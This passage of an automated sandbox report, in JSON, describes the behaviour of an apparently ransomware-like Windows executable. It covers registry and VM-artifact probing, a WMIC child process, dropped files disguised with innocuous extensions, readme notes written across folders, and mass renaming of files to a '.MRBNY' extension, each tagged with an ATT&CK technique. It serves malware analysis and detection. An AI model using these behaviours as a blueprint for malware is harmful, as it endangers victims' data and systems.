"category": "Installation/Persistence", "identifier": "api-16", "type": 6, "relevance": 1, "name": "Connects to LPC ports", "description": "\"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" connecting to \"\\ThemeApiPort\"\n \"WMIC.exe\" connecting to \"\\ThemeApiPort\"", "origin": "API Call", "attck_id": "T1559", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-172", "type": 3, "relevance": 1, "name": "Queries registry keys", "description": "\"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\CRYPTOGRAPHY\\DEFAULTS\\PROVIDER\\MICROSOFT ENHANCED RSA AND AES CRYPTOGRAPHIC PROVIDER\"; Key: \"TYPE\"; Value: \"\")\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\CRYPTOGRAPHY\\DEFAULTS\\PROVIDER\\MICROSOFT ENHANCED RSA AND AES CRYPTOGRAPHIC PROVIDER\"; Key: \"IMAGE PATH\"; Value: \"\")\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\CRYPTOGRAPHY\"; Key: \"MACHINEGUID\"; Value: \"\")\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"BIAS\"; Value: \"\")\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"STANDARDNAME\"; Value: \"\")\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"STANDARDBIAS\"; Value: \"\")\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"STANDARDSTART\"; Value: \"\")\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"DAYLIGHTNAME\"; Value: \"\")\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"DAYLIGHTBIAS\"; Value: \"\")\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"DAYLIGHTSTART\"; Value: \"\")\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"TIMEZONEKEYNAME\"; Value: \"\")\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"DYNAMICDAYLIGHTTIMEDISABLED\"; Value: \"\")\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"ACTIVETIMEBIAS\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-263", "type": 6, "relevance": 1, "name": "Touches files", "description": "\"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" trying to touch file \"C:\\Windows\\system32\\IMM32.DLL\"\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-synch-l1-2-0.DLL\"\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" trying to touch file \"C:\\Windows\\SYSTEM32\\sechost.dll\"\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" trying to touch file \"C:\\Rstrtmgr.dll\"\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" trying to touch file \"C:\\Windows\\system32\\Rstrtmgr.dll\"\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" trying to touch file \"C:\\ncrypt.dll\"\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" trying to touch file \"C:\\Windows\\system32\\ncrypt.dll\"\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" trying to touch file \"C:\\bcrypt.dll\"\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" trying to touch file \"C:\\Windows\\system32\\bcrypt.dll\"\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" trying to touch file \"\\Device\\KsecDD\"\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" trying to touch file \"C:\\Windows\\Temp\\VxOle32.dll\"\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" trying to touch file \"\\FileSystem\\Filters\\FltMgrMsg\"\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" trying to touch file \"C:\\Netapi32.dll\"\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" trying to touch file \"C:\\Windows\\system32\\Netapi32.dll\"\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" trying to touch file \"C:\\netutils.dll\"\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" trying to touch file \"C:\\Windows\\system32\\netutils.dll\"\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" trying to touch file \"C:\\srvcli.dll\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-161", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (non-executable)", "description": "\"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" trying to access non-existent file \"\\Device\\RasAcd\"\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" trying to access non-existent file \"Z:\\network.pcapng\"\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" trying to access non-existent file \"C:\\Program Files\\VMware\\readme.txt\"\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" trying to access non-existent file \"C:\\Program Files\\VMware\\\"\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" trying to access non-existent file \"C:\\ProgramData\\VMware\\readme.txt\"\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" trying to access non-existent file \"C:\\ProgramData\\VMware\\\"\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" trying to access non-existent file \"C:\\Program Files\\Common Files\\VMware\\readme.txt\"\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" trying to access non-existent file \"C:\\Program Files\\Common Files\\VMware\\\"\n \"WMIC.exe\" trying to access non-existent file \"C:\\Windows\\System32\\wbem\\WMIC.exe.Local\\\"\n \"WMIC.exe\" trying to access non-existent file \"C:\\Windows\\System32\\wbem\\WMIC.EXE.LOCAL\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-242", "type": 6, "relevance": 1, "name": "Writes files", "description": "\"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" writes file \"c:\\share\\readme.txt\"\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" writes file \"c:\\readme.txt\"\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" writes file \"c:\\dotnet.au3\"\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" writes file \"c:\\msocache\\readme.txt\"\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" writes file \"c:\\program files\\readme.txt\"\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" writes file \"c:\\program files\\desktop.ini\"\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" writes file \"c:\\programdata\\readme.txt\"\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" writes file \"c:\\recovery\\readme.txt\"\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" writes file \"c:\\torservice\\readme.txt\"\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" writes file \"c:\\users\\readme.txt\"\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" writes file \"c:\\users\\desktop.ini\"\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" writes file \"c:\\msocache\\all users\\readme.txt\"\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" writes file \"c:\\program files\\7-zip\\readme.txt\"\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" writes file \"c:\\program files\\7-zip\\7-zip.chm\"", "origin": "API Call"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-113", "type": 6, "relevance": 5, "name": "Touches files in program files directory", "description": "\"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" touched file \"C:\\Program Files\\VMware\\readme.txt\"\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" touched file \"C:\\Program Files\\Common Files\\VMware\\readme.txt\"\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" touched file \"C:\\Program Files\\readme.txt\"\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" touched file \"C:\\Program Files\\7-Zip\\readme.txt\"\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" touched file \"C:\\Program Files\\Adobe\\readme.txt\"\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" touched file \"C:\\Program Files\\AutoIt3\\readme.txt\"\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" touched file \"C:\\Program Files\\CCleaner\\readme.txt\"\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" touched file \"C:\\Program Files\\Common Files\\readme.txt\"\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" touched file \"C:\\Program Files\\DVD Maker\\readme.txt\"\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" touched file \"C:\\Program Files\\Google\\readme.txt\"\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" touched file \"C:\\Program Files\\HNC\\readme.txt\"\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" touched file \"C:\\Program Files\\Internet Explorer\\readme.txt\"\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" touched file \"C:\\Program Files\\Java\\readme.txt\"\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" touched file \"C:\\Program Files\\Microsoft Analysis Services\\readme.txt\"\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" touched file \"C:\\Program Files\\Microsoft Office\\readme.txt\"\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" touched file \"C:\\Program Files\\Microsoft OneDrive\\readme.txt\"\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" touched file \"C:\\Program Files\\Microsoft Silverlight\\readme.txt\"\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" touched file \"C:\\Program Files\\Microsoft SQL Server Compact Edition\\readme.txt\"\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" touched file \"C:\\Program Files\\Microsoft Sync Framework\\readme.txt\"\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" touched file \"C:\\Program Files\\Microsoft Synchronization Services\\readme.txt\"\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" touched file \"C:\\Program Files\\Microsoft Visual Studio 8\\readme.txt\"\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" touched file \"C:\\Program Files\\Microsoft.NET\\readme.txt\"\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" touched file \"C:\\Program Files\\Mozilla Firefox\\readme.txt\"\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" touched file \"C:\\Program Files\\Mozilla Maintenance Service\\readme.txt\"\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" touched file \"C:\\Program Files\\MSBuild\\readme.txt\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-2", "type": 6, "relevance": 8, "name": "Creates new processes", "description": "\"cmd.exe\" is creating a new process (Name: \"C:\\Windows\\System32\\wbem\\WMIC.exe\")", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "binary-0", "type": 8, "relevance": 3, "name": "Dropped files", "description": "\"HncATLExt80.enu\" has type \"DOS executable (COM 0x8C-variant)\"- Location: [%PROGRAMFILES%\\HNC\\Common80\\HncATLExt80.enu]- [targetUID: 00000000-00005716]\n \"OBugJFL1LUBK4T.img\" has type \"DOS executable (COM)\"- Location: [%USERPROFILE%\\Downloads\\OBugJFL1LUBK4T.img]- [targetUID: 00000000-00005716]\n \"nyjZw30AWbZ.txt\" has type \"DOS executable (COM)\"- Location: [%USERPROFILE%\\Downloads\\nyjZw30AWbZ.txt]- [targetUID: 00000000-00005716]\n \"dism.log\" has type \"Unicode text UTF-8 (with BOM) text with very long lines (312) with CRLF line terminators\"- [targetUID: N/A]\n \"DISMHOST.EXE.67A69857.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"Deup.pdf\" has type \"DOS executable (COM)\"- Location: [%USERPROFILE%\\Downloads\\Deup.pdf]- [targetUID: 00000000-00005716]\n \"FontConstants.au3\" has type \"DOS executable (COM)\"- Location: [%PROGRAMFILES%\\AutoIt3\\Include\\FontConstants.au3]- [targetUID: 00000000-00005716]\n \"dictionary.alcatel-lucent.aaa\" has type \"DOS executable (COM)\"- Location: [%PROGRAMFILES%\\Wireshark\\radius\\dictionary.alcatel-lucent.aaa]- [targetUID: 00000000-00005716]\n \"_GUICtrlRebar_DeleteBand.au3\" has type \"DOS executable (COM)\"- Location: [%PROGRAMFILES%\\AutoIt3\\Examples\\Helpfile\\_GUICtrlRebar_DeleteBand.au3]- [targetUID: 00000000-00005716]\n \"_GUICtrlTreeView_GetItemParam.au3\" has type \"DOS executable (COM)\"- Location: [%PROGRAMFILES%\\AutoIt3\\Examples\\Helpfile\\_GUICtrlTreeView_GetItemParam.au3]- [targetUID: 00000000-00005716]\n \"_GUICtrlMonthCal_SetMaxSelCount.au3\" has type \"DOS executable (COM)\"- Location: [%PROGRAMFILES%\\AutoIt3\\Examples\\Helpfile\\_GUICtrlMonthCal_SetMaxSelCount.au3]- [targetUID: 00000000-00005716]\n \"readme.txt\" has type \"ASCII text with CRLF line terminators\"- Location: [%ALLUSERSPROFILE%\\Microsoft\\readme.txt]- [targetUID: 00000000-00005716]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "api-162", "type": 6, "relevance": 1, "name": "Renames files", "description": "\"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" renamed original file\"C:\\dotnet.au3\" to \"C:\\dotnet.au3.MRBNY\"\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" renamed original file\"C:\\Program Files\\desktop.ini\" to \"%PROGRAMFILES%\\desktop.ini.MRBNY\"\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" renamed original file\"C:\\Users\\desktop.ini\" to \"C:\\Users\\desktop.ini.MRBNY\"\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" renamed original file\"C:\\Program Files\\7-Zip\\7-zip.chm\" to \"%PROGRAMFILES%\\7-Zip\\7-zip.chm.MRBNY\"\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" renamed original file\"C:\\Program Files\\7-Zip\\7z.sfx\" to \"%PROGRAMFILES%\\7-Zip\\7z.sfx.MRBNY\"\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" renamed original file\"C:\\Program Files\\7-Zip\\7zCon.sfx\" to \"%PROGRAMFILES%\\7-Zip\\7zCon.sfx.MRBNY\"\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" renamed original file\"C:\\Program Files\\7-Zip\\descript.ion\" to \"%PROGRAMFILES%\\7-Zip\\descript.ion.MRBNY\"\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" renamed original file\"C:\\Program Files\\7-Zip\\History.txt\" to \"%PROGRAMFILES%\\7-Zip\\History.txt.MRBNY\"\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" renamed original file\"C:\\Program Files\\7-Zip\\License.txt\" to \"%PROGRAMFILES%\\7-Zip\\License.txt.MRBNY\"\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" renamed original file\"C:\\Program Files\\AutoIt3\\Au3Check.dat\" to \"%PROGRAMFILES%\\AutoIt3\\Au3Check.dat.MRBNY\"\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" renamed original file\"C:\\Program Files\\AutoIt3\\AutoIt v3 Website.url\" to \"%PROGRAMFILES%\\AutoIt3\\AutoIt v3 Website.url.MRBNY\"\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" renamed original file\"C:\\Program Files\\AutoIt3\\AutoIt.chm\" to \"%PROGRAMFILES%\\AutoIt3\\AutoIt.chm.MRBNY\"\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" renamed original file\"C:\\Program Files\\CCleaner\\cc_config.ini\" to \"%PROGRAMFILES%\\CCleaner\\cc_config.ini.MRBNY\"\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" renamed original file\"C:\\Program Files\\CCleaner\\winapp2.ini\" to \"%PROGRAMFILES%\\CCleaner\\winapp2.ini.MRBNY\"\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" renamed original file\"C:\\Program Files\\Mozilla Firefox\\Accessible.tlb\" to \"%PROGRAMFILES%\\Mozilla Firefox\\Accessible.tlb.MRBNY\"\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" renamed original file\"C:\\Program Files\\Mozilla Firefox\\application.ini\" to \"%PROGRAMFILES%\\Mozilla Firefox\\application.ini.MRBNY\"\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" renamed original file\"C:\\Program Files\\Mozilla Firefox\\crashreporter.ini\" to \"%PROGRAMFILES%\\Mozilla Firefox\\crashreporter.ini.MRBNY\"\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" renamed original file\"C:\\Program Files\\Mozilla Firefox\\dependentlibs.list\" to \"%PROGRAMFILES%\\Mozilla Firefox\\dependentlibs.list.MRBNY\"\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" renamed original file\"C:\\Program Files\\Mozilla Firefox\\firefox.VisualElementsManifest.xml\" to \"%PROGRAMFILES%\\Mozilla Firefox\\firefox.VisualElementsManifest.xml.MRBNY\"\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" renamed original file\"C:\\Program Files\\Mozilla Firefox\\freebl3.chk\" to \"%PROGRAMFILES%\\Mozilla Firefox\\freebl3.chk.MRBNY\"\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" renamed original file\"C:\\Program Files\\Mozilla Firefox\\install.log\" to \"%PROGRAMFILES%\\Mozilla Firefox\\install.log.MRBNY\"\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" renamed original file\"C:\\Program Files\\Mozilla Firefox\\nssdbm3.chk\" to \"%PROGRAMFILES%\\Mozilla Firefox\\nssdbm3.chk.MRBNY\"\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" renamed original file\"C:\\Program Files\\Mozilla Firefox\\omni.ja\" to \"%PROGRAMFILES%\\Mozilla Firefox\\omni.ja.MRBNY\"\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" renamed original file\"C:\\Program Files\\Mozilla Firefox\\platform.ini\" to \"%PROGRAMFILES%\\Mozilla Firefox\\platform.ini.MRBNY\"\n \"3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe\" renamed original file\"C:\\Program Files\\Mozilla Firefox\\precomplete\" to \"%PROGRAMFILES%\\Mozilla Firefox\\precomplete.MRBNY\"", "origin": "API Call", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "api-139", "type": 6, "relevance": 3, "name": "Calls an API typically used to load a resource in memory", "description": "\"WMIC.exe\" called \"LoadResource with parameter {'hModule': '1778319360', 'hResInfo': '1779193512'}\" (UID: 00000000-00005348)\n \"WMIC.exe\" called \"LoadResource with parameter {'hModule': '4390913', 'hResInfo': '4391568'}\" (UID: 00000000-00005348)\n \"WMIC.exe\" called \"LoadResource with parameter {'hModule': '1777008640', 'hResInfo': '1777882792'}\" (UID: 00000000-00004432)\n \"WMIC.exe\" called \"LoadResource with parameter {'hModule': '2424833', 'hResInfo': '2425488'}\" (UID: 00000000-00004432)\n \"WMIC.exe\" called \"LoadResource with parameter {'hModule': '1778319360', 'hResInfo': '1779193512'}\" (UID: 00000000-00000848)\n \"WMIC.exe\" called \"LoadResource with parameter {'hModule': '4390913', 'hResInfo': '4391568'}\" (UID: 00000000-00000848)\n \"WMIC.exe\" called \"LoadResource with parameter {'hModule': '1777008640', 'hResInfo': '1777882792'}\" (UID: 00000000-00000312)\n \"WMIC.exe\" called \"LoadResource with parameter {'hModule': '5111809', 'hResInfo': '5112464'}\" (UID: 00000000-00000312)\n \"WMIC.exe\" called \"LoadResource with parameter {'hModule': '1778319360', 'hResInfo': '1779193512'}\" (UID: 00000000-00003424)\n \"WMIC.exe\" called \"LoadResource with parameter {'hModule': '4325377', 'hResInfo': '4326032'}\" (UID: 00000000-00003424)\n \"WMIC.exe\" called \"LoadResource with parameter {'hModule': '1777008640', 'hResInfo': '1777882792'}\" (UID: 00000000-00002948)\n \"WMIC.exe\" called \"LoadResource with parameter {'hModule': '4915201', 'hResInfo': '4915856'}\" (UID: 00000000-00002948)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "api-140", "type": 6, "relevance": 3, "name": "Calls an API typically used to find a resource in a module", "description": "\"WMIC.exe\" called \"FindResourceW\" with parameter \"1\" - (UID: 00000000-00005348)\n \"WMIC.exe\" called \"FindResourceW\" with parameter \"1\" - (UID: 00000000-00004432)\n \"WMIC.exe\" called \"FindResourceW\" with parameter \"1\" - (UID: 00000000-00000848)\n \"WMIC.exe\" called \"FindResourceW\" with parameter \"1\" - (UID: 00000000-00000312)\n \"WMIC.exe\" called \"FindResourceW\" with parameter \"1\" - (UID: 00000000-00003424)\n \"WMIC.exe\" called \"FindResourceW\" with parameter \"1\" - (UID: 00000000-00002948)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-222", "type": 6, "relevance": 2, "name": "Calls an API typically used to retrieve OS information", "description": "\"WMIC.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005348)\n \"WMIC.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00004432)\n \"WMIC.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00000848)\n \"WMIC.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00000312)\n \"WMIC.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00003424)\n \"WMIC.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00002948)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-147", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve 